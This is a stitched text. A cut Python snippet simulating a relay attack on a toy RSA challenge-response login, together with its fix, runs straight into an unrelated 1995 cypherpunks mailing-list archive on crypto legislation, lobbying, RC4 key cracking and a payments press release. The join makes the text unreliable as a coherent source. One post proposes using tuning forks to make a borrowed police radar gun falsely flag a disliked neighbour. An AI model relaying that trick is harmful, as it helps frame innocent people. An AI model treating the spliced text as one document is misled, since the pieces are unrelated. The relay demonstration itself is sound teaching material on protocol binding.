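# Constructed toy RSA key for user U: two Mersenne primes, far too small for real use.
P, Q, E = 2**31 - 1, 2**61 - 1, 65537
PKU = (P * Q, E)                       # public half, known to every server
SKU = pow(E, -1, (P - 1) * (Q - 1))    # private exponent, held only by U on host A


def digest(n, binding=()):
    """MD5 over the challenge N plus optional length-prefixed binding fields."""
    h = hashlib.md5(n.to_bytes(16, "big"))   # MD5 because the 1995 protocol used it
    for field in binding:
        h.update(len(field).to_bytes(2, "big") + field)
    return h.digest()


class Server:
    """Host that lets the holder of SKu into account U."""

    def __init__(self, name, bind):
        self.name, self.bind = name, bind

    def challenge(self):
        self.n = secrets.randbits(64)
        modulus, e = PKU
        return pow(self.n, e, modulus)           # {N}_PKu

    def accepts(self, response, peer, session_key):
        # Bound variant: expected value covers (peer host, own name, session key).
        binding = (peer, self.name, session_key) if self.bind else ()
        return secrets.compare_digest(response, digest(self.n, binding))


class UserClient:
    """U on host A; answers a challenge from the host it believes it is logging into."""

    def __init__(self, name, bind):
        self.name, self.bind = name, bind

    def respond(self, encrypted_n, server_name, session_key):
        n = pow(encrypted_n, SKU, PKU[0])        # recover N with SKu
        binding = (self.name, server_name, session_key) if self.bind else ()
        return digest(n, binding)


def direct_login(bind):
    """A logs into B directly; both ends share the session key Kab."""
    a, b = UserClient(b"A", bind), Server(b"B", bind)
    kab = secrets.token_bytes(16)
    return b.accepts(a.respond(b.challenge(), b"B", kab), b"A", kab)


def relayed_login(bind):
    """A logs into untrusted C, which passes B's challenge through unchanged."""
    a, b = UserClient(b"A", bind), Server(b"B", bind)
    kac, kbc = secrets.token_bytes(16), secrets.token_bytes(16)  # two separate sessions
    from_b = b.challenge()                   # B -> C, intended for U
    answer = a.respond(from_b, b"C", kac)    # C -> A -> C: A believes C is asking
    return b.accepts(answer, b"C", kbc)      # C -> B: B sees C as the peer host


if __name__ == "__main__":
    for bind in (False, True):
        print(f"bind={bind}: direct={direct_login(bind)} relayed={relayed_login(bind)}")
```

With the unbound response, B cannot tell the forwarded answer from a direct one; once the response covers the host names and session key, A's answer for its session with C no longer verifies at B.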




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Scoggins <gds@connex.com>
Date: Fri, 14 Jul 95 02:06:58 PDT
To: Cypherpunks <cypherpunks@toad.com>
Subject: Re: Anti-Electronic Racketeering Act of 1995
In-Reply-To: <199507131932.PAA01245@bb.hks.net>
Message-ID: <Pine.3.89.9507140106.B22784-0100000@apollo.connex.com>
MIME-Version: 1.0
Content-Type: text/plain



According to Shari Steele:

> Fortunately, the bill does not have a very promising future.  The bill has
> no co-sponsors.  It was immediately referred to the Committee on the
> Judiciary, where it currently sits.  LEXIS's bill tracking report only
> gives it a 10% chance of passing out of the committee.

Thank God, if true.

After lurking on this list for a couple of months, I finally feel 
motivated to comment by this latest bout of official stupidity.

I realize that I am preaching to the choir here, so if you don't need any 
more convincing, feel free to delete this now.  And for those readers not 
in the US - pray pardon the US-centric tone of this piece.

I have been steadily lowering my opinion of the human race for 20 years 
now.  It is depressing to realize that I may have to ratchet it downward 
another notch or two.  That our various elected representatives and 
assorted civil masters are stupid, venal, corrupt, short-sighted, 
incompetent, arrogant, foolish, greedy, megalomaniacal, immoral poltroons 
with the manners of billy goats utterly lacking in common sense or common 
decency no longer surprises me.  What does still surprise me is just *how* 
stupid, venal, corrupt, etc they really are.  If we can not govern 
ourselves better than this, then we really are just overgrown chimpanzees.

And our cousin primates should probably feel insulted by the comparison.

The United States used to be a special place, and I used to be proud of 
being a citizen of this country.  Sadly, this is no longer true.  Our 
government, in all three of its branches and its multiplicity of 
agencies, bureaus, departments and services, has made a mockery of the 
Constitution.  The Ninth and Tenth Amendments are laughed at, the Fourth 
and Fifth Amendments are in tatters, the Second is under incessant 
attack, and the First...  well, the First Amendment to the Constitution 
of the United States is basically being gang-raped by Congress as we speak.

Consider those words, "as we speak".  Clearly, I consider what I am doing 
now to be "speech".  It is not face to face, I am not in the presence of 
all of you in one place at one time speaking these words aloud - but it 
is still speech.  Most of you who read this, perhaps all of you, will 
agree, I think.  What we do on the 'net - in email, in Usenet, in irc - 
is communication between human beings - fundamentally, speech.  It is 
obvious to us that speech, regardless of medium, should be protected by 
the First Amendment.

Equally obvious, many in Congress, the Administration and the Federal Courts
disagree.  The courts, and in particular the Supreme Court have by a 
process of straining at gnats and swallowing camels "interpreted" the 
Constitution in such a way as to permit clearly unconstitutional laws and 
practices to continue.  They are wrong, but so what.  The knowledge that 
you are wholly right and that your opponents are wholly wrong is of small 
comfort when the noose is around your neck.

Many Americans now actively fear the Federal government and its Law 
Enforcement Agencies, and justly so.  Every day more evidence emerges of 
profound and widespread abuse of power, corruption and official arrogance 
on the part of the LEAs, yet many of our Senators introduce and vote for 
legislation that would severely weaken the precious few remaining 
restraints on their power, and grant them even broader and ever more 
sweeping powers to invade the privacy and abridge the rights of American 
citizens.

The United States used to be special.  It was founded by people who 
believed that human beings had rights that were *not* simply privileges 
granted by the state, but were innate and could *not* be taken away.  (Or 
at least you did as long as you were an adult white male property 
owner.)  They believed that governments had no powers unless they were 
granted by the people, not the other way round.  In short, they believed 
in the principles and philosophy outlined in the Declaration of Independence.

This is no longer the case.  Two hundred and nineteen years later, we pay 
lip service to the ideals of the Declaration every July Fourth, but the 
last person in Congress who paid any attention to those ideals was 
apparently Barry Goldwater.

Let us be realistic for a moment.  Consider this a half-hearted apologia 
for Senator Grassley, if you will.  France already bans crypto, modulo 
some exceptions that I believe are rather hard to qualify for.  And I 
consider a judicial system based on the Napoleonic Code reprehensible.  
Yet by all accounts France remains a tolerable and decent place to live.  
Without irony, most people refer to France as part of the Free World.  
The UK, Canada and Australia have censorship laws, Official Secrets Acts 
and the like that permit prior restraint of publication and other things 
that we Americans find distressing.  Yet I believe that the UK, Canada and 
Australia remain tolerable and decent places to live, and they too are 
considered part of the Free World.

If Senator Grassley's bill is enacted into law, it will not be the End of 
the World.  The United States will not suddenly have become Nazi Germany.
This country will remain, for the vast majority of Americans and even 
most cypherpunks, a tolerable and decent place to live.  It will still be 
one of the few countries in the world to grant its citizens the 
relatively unchecked freedom to speak their minds, to work at whatever 
profession or occupation they wish, to travel where they wish.

It just means that a tiny bit more of our rights will have been eroded, 
our freedom lost - a little bit more of what used to make this a special 
place, of what used to make this country different from - and in my 
opinion as a still somewhat patriotic American - better than France, Canada, 
Australia and the UK - will have disappeared.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 14 Jul 95 02:19:59 PDT
To: "Vladimir Z. Nuri" <cypherpunks@toad.com
Subject: Re: speeding detected by civilians
Message-ID: <199507140918.CAA04658@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:01 PM 7/13/95 -0700, Vladimir Z. Nuri wrote:
>Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing 
>citizens to check out radar guns from the local police department to 
>catch speeders in their community. The radar guns are combined with 
>cameras in order to instantaneously capture the car, license number, and the 
>rate of speed. The citizens can check out the units for a week at a time. The 
>police have stated that they, at this time, will use the data to issue 
>warning letters to the violators.

I wonder how they'll feel if citizens start tracking the speeds of
police cars and reporting them..... :-)
#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: stewarts@ix.netcom.com (Bill Stewart)
Date: Fri, 14 Jul 95 02:20:11 PDT
To: cypherpunks@toad.com
Subject: Re: Fight, or Roll Over?
Message-ID: <199507140918.CAA04669@ix2.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 03:56 PM 7/13/95 -0700, Timothy C. May wrote:
>criminalizes groups which support This Year's Enemies. (Like the War with
>Oceania--or was it Eurasia?--the friend of today was yesterday's criminal
>organization. 
Wow!  The Oceania folks haven't even raised enough funds to make a credible
floating city, and already they're at war!?  (Or, alternatively,
No, Oceania's always been at war with _East_asia...)

>Some would say this means Cypherpunks should step into the fray and become
>a lobbying group. I don't see us as having the structure or organization to
>become such a group. Those who wish to should probably form a real group to
>do this, with bylaws and elected officials.

There's already an EFF, and lobbying probably looks better with our EFF hats
on than with Cypherpunks hats and non-exportable T-Shirts on.  Cypherpunks
is more for lobbying the public by putting out code than for lobbying CONgress.

>Anarchies are great, but there's no way an anarchy can have a "spokesman,"
>or a budget for travel and lobbying, or a hundred other things that a
>lobbying group needs. Cypherpunks--this list--is just not in a position to
>be this group.

Consensus-oriented coalitions can also work marvelously inefficiently :-)

#                                Thanks;  Bill
# Bill Stewart, Freelance Information Architect, stewarts@ix.netcom.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Tatu Ylonen <ylo@cs.hut.fi>
Date: Thu, 13 Jul 95 16:26:45 PDT
To: sunder@escape.com
Subject: Re: Anti-Electronic Racketeering Act of 1995 (fwd)
In-Reply-To: <Pine.SUN.3.91.950713163526.25718G-100000@escape.com>
Message-ID: <199507132326.CAA18396@shadows.cs.hut.fi>
MIME-Version: 1.0
Content-Type: text/plain


> So, what countries are left free of encryption regulations? (English 
> speaking preferred, with affordable net access.)  Time to see about 
> getting a new passport...

Finland, as far as I know, does not have any restrictions on
encryption, and has a friendly population.  Finnish is indecipherable
at first, but almost everybody can speak English (at least the younger
population).  There is a big shortage of competent computer and
electronics engineers.  Nokia Telecommunications (a major mobile phone
manufacturer) for example would need much more competent people than
they can get - not to mention the smaller companies.

Finland has excellent network connections - typical ftp rates from the
US are tens of kilobytes per second (except at peak hours).  There is
a lot of competition among the internet service providers.  About
$20/month gets you 28.8k dialup ppp (1-2 hours/day at that rate, I
think).  Another provider charges about 5 cents per minute.  A leased
64k line is around $100/month.

The climate is nice during the summer (15-25 Celsius typical), and
cold during the winter.

Taxes are outrageous though, so you really had better check that
first.  But, the taxes include things like medical insurance, pension
insurance, etc., and are thus not directly comparable.

And of course, we are now a member of the European Union, which
worries me a little on this front...

(Sorry, I just couldn't resist the temptation :-)

   Tatu




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Thu, 13 Jul 95 23:31:00 PDT
To: cypherpunks@toad.com
Subject: Grassley:  correction
Message-ID: <Pine.ULT.3.91.950714022706.6071A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


Please disregard my post about Grassley being the chair of the senate 
Committee on the Judiciary; Orrin Hatch (Utah) is the chair.

The number of the committee office is (202)224-5225.

I'm sorry for the misinformation--hope it didn't cause too much frustration.

-=kathleen m. ellis=-

"Buy your data, encrypt a rifle, and wait to be revolting..."
                                       -=The Book of Phil 7:1=-
kelli@zeus.towson.edu              http://zeus.towson.edu/~kelli/
GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- 
M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu
BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kevin Wang (The Scarecrow) <kwang@blackbox.punk.net>
Date: Fri, 14 Jul 95 00:34:52 PDT
To: cypherpunks@toad.com
Subject: RC4 - I grabbed too much keyspace
Message-ID: <199507140732.DAA08254@bb.hks.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Due to a misunderstanding on my part, I grabbed too much key space.
Here's one contiguous block that needs to be worked on:

9 1a80000000 31
10 1b00000000 31
11 1b80000000 31
12 1c00000000 31
13 1c80000000 31
14 1d00000000 31
15 1d80000000 31
16 1e00000000 31
17 1e80000000 31
18 1f00000000 31
19 1f80000000 31
20 2000000000 31
21 2080000000 31

   - Kevin Wang, kwang@lore.acs.calpoly.edu
- ---
[This message has been signed by an auto-signing service.  A valid signature
means only that it has been received at the address corresponding to the
signature and forwarded.]

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Gratis auto-signing service

iQBFAwUBMAYdXioZzwIn1bdtAQHgRgF/dsbrZ2oYofdm52KX8QsAOlg+Seiw2cXO
1P3p0HBbDW7Ukyyyv1UphZkrD7JQsDJP
=m+pJ
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an250888@anon.penet.fi
Date: Thu, 13 Jul 95 21:06:09 PDT
To: cypherpunks@toad.com
Subject: Deployment
Message-ID: <9507140349.AA21714@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>In addition, now is the time to deploy stego, on a massive scale.  
>How many stego programs have been released for Unix?

Unix?  The masses use DOS, Windows, Mac, and OS/2.  All you Unix gurus
with nifty Unix crypto utilities that PC users can only wonder about
need to buy PC's and start porting now if you want to get anywhere.

Unix?  Hah!  Gimme a break!  Unix is a Warsaw ghetto.

----------------------------------------------------------------------------
To find out more about the anon service, send mail to help@anon.penet.fi.
If you reply to this message, your message WILL be *automatically* anonymized
and you are allocated an anon id. Read the help file to prevent this.
Please report any problems, inappropriate use etc. to admin@anon.penet.fi.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an250888@anon.penet.fi
Date: Thu, 13 Jul 95 21:07:02 PDT
To: cypherpunks@toad.com
Subject: Off Your But and Learn!
Message-ID: <9507140349.AA21822@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


>I am not a programmer either, but I am being motivated to become one. 
>If only there was more time.

Neither am I, but may I suggest the following:

S. Prata, C++ Primer Plus: Teach Yourself Object-Oriented Programming,
2d ed., Waite Group Press, ISBN 1-878739-74-3 (1995).  Nuts & bolts.

S. Lippman, C++ Primer, 2d ed., Addison-Wesley, ISBN 0-201-54848-8
(1993).  Not quite so nuts and bolts, but good to read after covering
the treatment of the same material in Prata.

I've just started working through these and find them effective.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "K. M. Ellis" <kelli@zeus.towson.edu>
Date: Fri, 14 Jul 95 01:12:44 PDT
To: "Timothy C. May" <tcmay@sensemedia.net>
Subject: Cypherpunks Lobbying?
In-Reply-To: <ac2aef1700021004f93e@[205.199.118.202]>
Message-ID: <Pine.ULT.3.91.950714023803.6182A-100000@zeus.towson.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Thu, 13 Jul 1995, Timothy C. May wrote:

> 
> I'd hardly call my view "throwing in the towel." What I said clearly enough
> was that the Washingtonians can throw out repressive legislation much
> faster than we can--and I speak in terms of "we" as being the EFF, EPIC,
> NRA, ACLU, etc., and _not_ the Cypherpunks, who have no lobbying activities
> to speak of.

I'm glad you brought this up, Tim, because Pat Farrell, Carl Ellison, and
I have been discussing the possibility of doing just that over the past
week or so.  The three of us, in addition to many others (we like to call
ourselves "The Mid-Atlantic Cypherpunks") are very near DC and thought we
might take advantage of this on behalf of others who don't have the luxury
of living near their legislators. 

Our idea (and it was originally limited to lobbying against the CDA, but
we can expand it now to lobby against that and S.974) was to have Cypherpunks
send letters (yes, authentic _snail mail_) to a Cypherpunk willing to go
deliver it in person, (namely me) and talk to whoever is there, be it the
congressperson or one of his/her aides.  The strategy of this action would
be to say, "hello, we represent <insert your organization here> and we
oppose <insert appropriate legislation title here> and we feel this way
because <insert very reasonable and diplomatic explanations in easy,
mono-syllabic words so that the congresscritter can understand here> and
here is a letter from one of your constituents who feels the same way we
do."  A simple lobby. 

I thought this might be effective because it seems that a lot of
representatives are difficult to get in touch with, since not all of them
have e-mail addresses.  I think there is a certain advantage in this kind
of action from an educational standpoint, considering that the House
doesn't seem to have a strong backer for this bill like the Senate did,
and the many Congresscritters who know nothing about the net only need
someone to explain the consequences of such a bill to them.  Furthermore,
to those ignorant of the net and its ways, a printed out list of names and
e-mail addresses collected through the web is completely foreign and
perhaps intimidating to them, and therefore not all that helpful to us,
IMHO.  Hand-signed letters (or hand-written, if your printing is more
legible than mine) in good, old-fashioned envelopes is just what critters
of this sort need to see. 

If any US citizens here would like me (and hopefully some older, wiser 
cypherpunks willing to join me on this trip) to deliver a letter to their 
congressperson please send a letter to this address:

                          The Hon. Whoever
                        c/o Kathleen M. Ellis
                           TSU box 898
                        Towson State University
                         8000 York Road
                          Towson, MD  21204

On the envelope you must include:

	The name of the congressperson (if I have to open the letter to be able 
			to tell who it is meant for it'll lose some of its 
			authenticity)

	My full address (yes, all five lines of it, or I'll never get it)

	If you can get it, the office location of representative 
			(building name and room number) printed on the 
			back or something, if you can't find it don't 
			worry, I'll find it, but if you can find it I'd 
			appreciate it.  You can get it at the URL below.

	A return address

	A postmark from your district

The letter must have:

	The specific bill you are against; its number, title, and sponsors 
			(the CDA is H.R.1004/S.652 sponsored by 
			Senator James Exon, from Nebraska)

	Possible alternatives (my suggestion is H.R. 1978, sponsored by 
			Cox and Wyden)

	A polite introduction, a concise body, and a gracious 
			conclusion :). 

	Your address and signature.

If you need more information for your letter, good URLs on the subject are:

http://www.cdt.org/cdw.html
http://www.cdt.org/petition.html
http://www.eff.org/pub/EFF/Issues/censorship/Exon_bill/
http://uvacs.cs.virginia.edu/~hwh6k/public/S314_stuff.html
http://www.phantom.com/~slowdog
http://www.panix.com/vtw/exon/

If you don't know who your representative is, try to find her/him through

http://www.house.gov

and look for a familiar looking name from your state.  Unfortunately 
there's no "point-and-click" US map to refer to to find out which 
district is yours, but you should be able to find out fairly easily by 
looking for familiar names.  If you really get stuck, try your local 
League of Women Voters.

The main thing is, I need these letters soon.  In order to have a shot at
getting to talk to anyone, I must make appointments with the offices of
the respective representatives.  The House is expected to vote on this
topic any day now; the clock's a-ticking.  I ask that all letters be sent
so that I can receive them by July 23rd.  I aim to raid congress on
Tuesday, July 25th.  This date could be changed, depending on the definite
responses I get from people willing to help. 

I have lobbied before, and I'm up to the task, but it would be nice to
have some other politically-oriented cypherpunks along for, at the very
least, moral support.  Anybody interested, Please Please Please send me
some e-mail.  Carl or Pat might go, and if we get enough people to help we 
can split the workload among teams.

If anyone has comments/questions/suggestions, don't hesitate.  I'd
appreciate whatever isn't necessary to go up on the list to be sent to me
privately, so's I don't get into trouble for "inciting spam". 

-=Kathleen M. Ellis=-

kelli@zeus.towson.edu              http://zeus.towson.edu/~kelli/
GAT d? H+ s+++:-- !g p? !au a- w++@ !v@ c++++ UL++ P+ L+ 3 E---- N+ K W--- 
M-- V-- po- Y++ t+ 5-- jx R G'''' tv- b+++ D-- B e+ u** h* f++ r--- n+ z**
Diverse Sexual Orientation Coll.Towson State University DSOC@zeus.towson.edu
BigBrotherSystemsBBS........BigBrotherIsWatchingYou.......(410)494-3253#11










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Piete Brooks <Piete.Brooks@cl.cam.ac.uk>
Date: Thu, 13 Jul 95 23:08:08 PDT
To: cypherpunks@toad.com
Subject: Looks like "Cypherpunks Key Cracking Ring" is done .....
Message-ID: <"swan.cl.cam.:128710:950714060757"@cl.cam.ac.uk>
MIME-Version: 1.0
Content-Type: text/plain


I noticed that http://dcs.ex.ac.uk/~aba/percent.html was reporting:

                                                            Percentage complete

                              PERCENTAGE COMPLETE

   4094 / 4096 = 100.6 percent

which looked a bit odd to me :-) Do I detect a Pentium at work ??

Anyway, I grabbed a 29 bit address space and got:

ffe0000000 29

   THATS IT FOLKS! ALL DONE!

and now it reports:
                                                            Percentage complete

                              PERCENTAGE COMPLETE

   4096 / 4096 = 100.7 percent




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: merriman@arn.net (David K. Merriman)
Date: Fri, 14 Jul 95 06:40:38 PDT
To: frogfarm@yakko.cs.wmich.edu
Subject: Re: Suing/Reputations (was: Root Causes)
Message-ID: <199507141348.IAA09516@arnet.arn.net>
MIME-Version: 1.0
Content-Type: text/plain


Thus did FrogFarm (?? :-) bespake:

... <legal cites excised> ...

This sounds like what I was thinking of.

Dave Merriman
This is a test (3 UUE lines) of the unconstitutional ITAR - 1/713th
of the PGP executable. See below for getting YOUR chunk! 
------------------ PGP.ZIP Part [015/713] -------------------
M=$<(&L`#*IPP",(G6(,,S,`P](<2RWU96XCW86/JBYV8A\D8@X'HB_9H#&\X
MX'PCUB.,13B"X8`R?^J-:UB.M_`U\>[#)BS&5$0C,Y#^1CS>1`\T1QTXX6!3
M8H,),S$8G>&.WP(8IRA`-M['+`Q%&_C"">5-F%LX@<_Q$;*P'',Q$Z/AA[8M
-------------------------------------------------------------
for next chunk to export --> http://dcs.ex.ac.uk/~aba/export/






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Rogaski <rogaski@phobos.lib.iup.edu>
Date: Fri, 14 Jul 95 05:41:09 PDT
To: cypherpunks@toad.com (Cypherpunks)
Subject: Re: speeding detected by civilians
In-Reply-To: <199507132101.OAA27319@netcom12.netcom.com>
Message-ID: <199507141241.IAA24832@phobos.lib.iup.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

- From the node of Vladimir Z. Nuri:
: 
: Vernon Hills, IL.
: 
: Vernon Hills, Illinois, a Chicago suburb, has passed legislation allowing 
: citizens to check out radar guns from the local police department to 
: catch speeders in their community. The radar guns are combined with 
: cameras in order to instantaneously capture the car, license number, and the 
: rate of speed. The citizens can check out the units for a week at a time. The 
: police have stated that they, at this time, will use the data to issue 
: warning letters to the violaters.
: 

Got a neighbor you don't like?  Rent one of these here radar guns and
get a set of tuning forks.  Set up the unit to catch your target, and then
just hold a tuning fork up in front of the unit (but out of range of the 
mounted camera).

PS -- Didn't traffic cops have one of the highest rates of testicular
cancer by occupation due to the widespread habit of resting radar guns in
their laps without switching them off?

- -----
#include <std_disclaimer.h>

Mark Rogaski           100,000 lemmings     rogaski@phobos.lib.iup.edu 
aka Doc, wendigo        can't be wrong!     http://www.lib.iup.edu/~rogaski/

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMAZlyx0c4/pqJauBAQHysAQAtEsBrdEJ9Esiybu9L8/398oaALrWGHuz
5UeeIfeaXEsG+c/Ns3T7pK47kRGNt5aa/xsT++sC0vqzXgWwZU4UnIMF5Lic8tsW
c35+EML7CEK77EvLzqwYMheowSptHKMGhwy0GhBFXl1vA0zCP66Hho3RstkFEDeg
wNIiyJQzG10=
=TGLu
-----END PGP SIGNATURE-----



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Doug Hughes <Doug.Hughes@Eng.Auburn.EDU>
Date: Fri, 14 Jul 95 06:49:27 PDT
To: cypherpunks@toad.com
Subject: Re: OTP server..
In-Reply-To: <9507140235.AA13456@snark.imsi.com>
Message-ID: <doug-9506141349.AA0110320@netman.eng.auburn.edu>
MIME-Version: 1.0
Content-Type: text/plain



Perry Metzger writes:
>
>Doug Hughes writes:
>> How about WWW one time pad servers? You browse to your
>> favorite OTP server, which has a random number generator
>> running in the background. You tell it to give you a block
>> of X bytes, and mail it to persons 1, 2, 3, ... N.
>
>Do I get you wrong, or are you proposing the mailing of one time pads
>in the clear?
>
Not necessarily. It could be sent any number of different ways.
Heck, you could mail (email, US, fedex) a bunch of passphrases
or whatever to a site (as an extreme example) to xor with the random
number string. They send you the product, you xor with your passphrases
in the appropriate order, and you have the true random number string.
 Of course the feds could just get a court order and snarf all your
passphrases or keys if it was in this country. People would probably
be better off using a server in another country and having the pad
sent to them encrypted or hashed in some fashion.

>> Enough of these things would be REALLY tough to monitor...
>
>The NSA is willing to monitor virtually all international
>telecommunications traffic and try to figure out what's interesting. I
>doubt this poses much of a challenge to them. Not to mention the fact
>that it probably wouldn't pose much of a challenge to *me* given a set
>of wiretaps and I have virtually no resources...
>

What if we just call them random number servers? Does that make them
uninteresting? What if there are dozens or hundreds of them receiving
thousands or 10's of thousands of connections a day? (Of course this
couldn't happen overnight. :) )
 After all, there are plenty of good purposes to which you can put
a random number, but an OTP is probably suspicious enough to warrant
scrutiny.
 Maybe it's all too much work for too little value.  All you need is
one byte or int, or whatever to xor with the RN before it's sent to
you over the length of the int. Securely getting these bytes/keys
to the server might be tricky. Maybe it's impossible.  US Mail is
still guaranteed to be private.. (don't everybody laugh at once. ;) )

 Okay, assuming that the OTP idea just won't fly, is a general purpose
random number generating web site, or internet service of interest?
It could be a useful thing for a seed for individuals who want to do
their own OTP-ing. (Hey stan, I'll get us both an RN from the server
on the net, XOR each byte with 0x3e and will use that as an OTP for
a secret message). For frequent use it might be a huge bust
because you'd need a secure channel to get a secure channel.

--
____________________________________________________________________________
Doug Hughes					Engineering Network Services
System/Net Admin  				Auburn University
			doug@eng.auburn.edu
		"Real programmers use cat > file.as"




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: rah@shipwright.com (Robert Hettinga)
Date: Fri, 14 Jul 95 06:23:11 PDT
To: cypherpunks@toad.com
Subject: Checkfree/Cybercash Press release
Message-ID: <v02120d00ac2c20283a51@[199.0.65.105]>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Fri, 14 Jul 1995 03:42:07 -0700
>From: Davidwfox@eworld.com
>To: www-buyinfo@allegra.att.com, e-payment@bellcore.com
>Subject: Checkfree/Cybercash Press release
>
>CHECKFREE AND CYBERCASH JOIN FORCES TO DELIVER COMPREHENSIVE ELECTRONIC COM
>
>       Consumers can conduct Internet transactions using checks,
>                       credit cards or cash
>
>    BOSTON, July 13 /PRNewswire/ -- Checkfree Corporation and CyberCash,
>Inc. announced today at the Interactive Services Association conference
>that they will cooperatively develop and market products and services
>that will allow consumers to safely conduct payment transactions, in
>real time, over the Internet using credit cards, debit cards, checks or
>cash.
>    Checkfree, the nation's leading provider of electronic commerce
>services, will license technology from CyberCash, a leader in secure,
>end-to-end Internet payment systems.  Checkfree will integrate
>CyberCash's high level security features and ability to conduct cash
>transactions into the Checkfree Wallet(TM), creating a single solution
>for electronic payment transactions that offers checks, credit cards,
>cash, coin or micropayments.
>    "Partnering with CyberCash was the logical choice for Checkfree,"
>says Pete Kight, founder and CEO of Checkfree.  "Checkfree is committed
>to leading the way for electronic commerce, and providing plug and play
>Internet transaction solutions.  The Checkfree Wallet(TM) is now an even
>more attractive transaction platform for both consumers and merchants."
>    The Checkfree Wallet(TM) was introduced in April to allow consumers
>to purchase goods and services from on-line merchants in a safe,
>convenient and familiar manner.  The Checkfree Wallet(TM) does not
>require prior registration with merchants, and on-line shoppers pay no
>fees or transaction service charges.  With the addition of CyberCash's
>technology consumers will be able to utilize cash securely over the
>Internet and merchants will receive authorization in real time.  In
>addition, merchants will be able to accept payments from any on-line
>consumers, regardless of the server or browser they are using.
>    "Checkfree's long, successful record of developing applications for
>home banking and electronic bill payment is a perfect complement to
>CyberCash's secure Internet transaction and electronic cash expertise,"
>said Magdalena Yesil, vice president of marketing for CyberCash.
>"Together we can offer a complete array of payment tools that allow
>consumers to conduct spontaneous transactions and pay bills via the
>Internet."
>    Checkfree and CyberCash will focus on developing products that can
>be easily integrated into any browser system and merchant server.  The
>new Internet transaction product offering, which will be co-branded by
>Checkfree and CyberCash, is scheduled for release this fall.  The
>product will initially be available free-of-charge via NetCom's
>NetCruiser Internet browser as well as other leading Internet browsers.
>Merchant interest to date also includes ID Software, the developers of
>Doom(TM).
>
>    About CyberCash
>    CyberCash, Inc. of Reston, Virginia, was founded in August 1994 to
>partner with financial institutions and providers of goods and services
>to deliver secure Internet payment systems.  The CyberCash approach is
>based on establishing a trusted link between the seemingly unpredictable
>world of cyberspace and the traditional banking world.  CyberCash serves
>as a conduit through which payments can be transported easily, safely
>and instantaneously between buyers, sellers and their banks.
>    The CyberCash system operates on top of any general security system
>such as SSL or Secure HTTP.  CyberCash beta software is currently
>available free-of-charge and can be downloaded from the company's WWW
>server at http://www.cybercash.com.  The company's initial service that
>accepts payments using any major credit card is scheduled for full
>commercial deployment this summer.  Electronic cash services are
>expected by the end of 1995.
>    CyberCash's principal founders, Bill Melton and Dan Lynch, have
>brought together a team with unparalleled experience in credit card and
>debit card automation, internet telecommunications and security.  In
>April, CyberCash was chosen by Interactive Age as one of the 100 Best
>Business Web Sites.  For further information about CyberCash, access its
>WWW server or call 800-9CYBER1.
>
>    About Checkfree
>    Checkfree Corporation, the nation's leading electronic commerce
>company, last year processed more than $6 billion in payments for
>consumers and corporate clients, with more than six million consumers
>and one million businesses benefiting from its services.  Checkfree
>serves consumers, business and financial institutions with a wide array
>of product and service offerings, each finely tuned to the specific
>needs of its users.  All leverage Checkfree's extensive technology
>infrastructure which includes its patented and proven electronic bill
>payment system.  Founded in 1981, Checkfree Corporation is headquartered
>in Columbus, Ohio, where it employs 370 full-time associates.  Checkfree
>is privately held.
>    For additional information about Checkfree, access its worldwide web
>server at: http://www.checkfree.com
>    -0-                          7/13/95
>/CONTACT:  Jennifer Sims, 415-904-7070, ext. 275 or
><jsims@accesspr.com>, or Nicol Davis, 415-904 7070, ext  281, or
><ndavis@accesspr.com>, both of Access Public Relations, for Checkfree;
>or Susan Ice of Thomas Associates, 415-325-6236, or susani@thomaspr.com
>for CyberCash, Inc./
>

-----------------
Robert Hettinga (rah@shipwright.com)
Shipwright Development Corporation, 44 Farquhar Street, Boston, MA 02131
USA (617) 323-7923
"Reality is not optional." --Thomas Sowell
>>>>Phree Phil: Email: zldf@clark.net  http://www.netresponse.com/zldf <<<<<






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Pat Farrell" <pfarrell@netcom.com>
Date: Fri, 14 Jul 95 06:29:35 PDT
To: cypherpunks@toad.com
Subject: RE: Fight, or Roll Over?
Message-ID: <34125.pfarrell@netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


In message Thu, 13 Jul 1995 02:41:12 -0800,
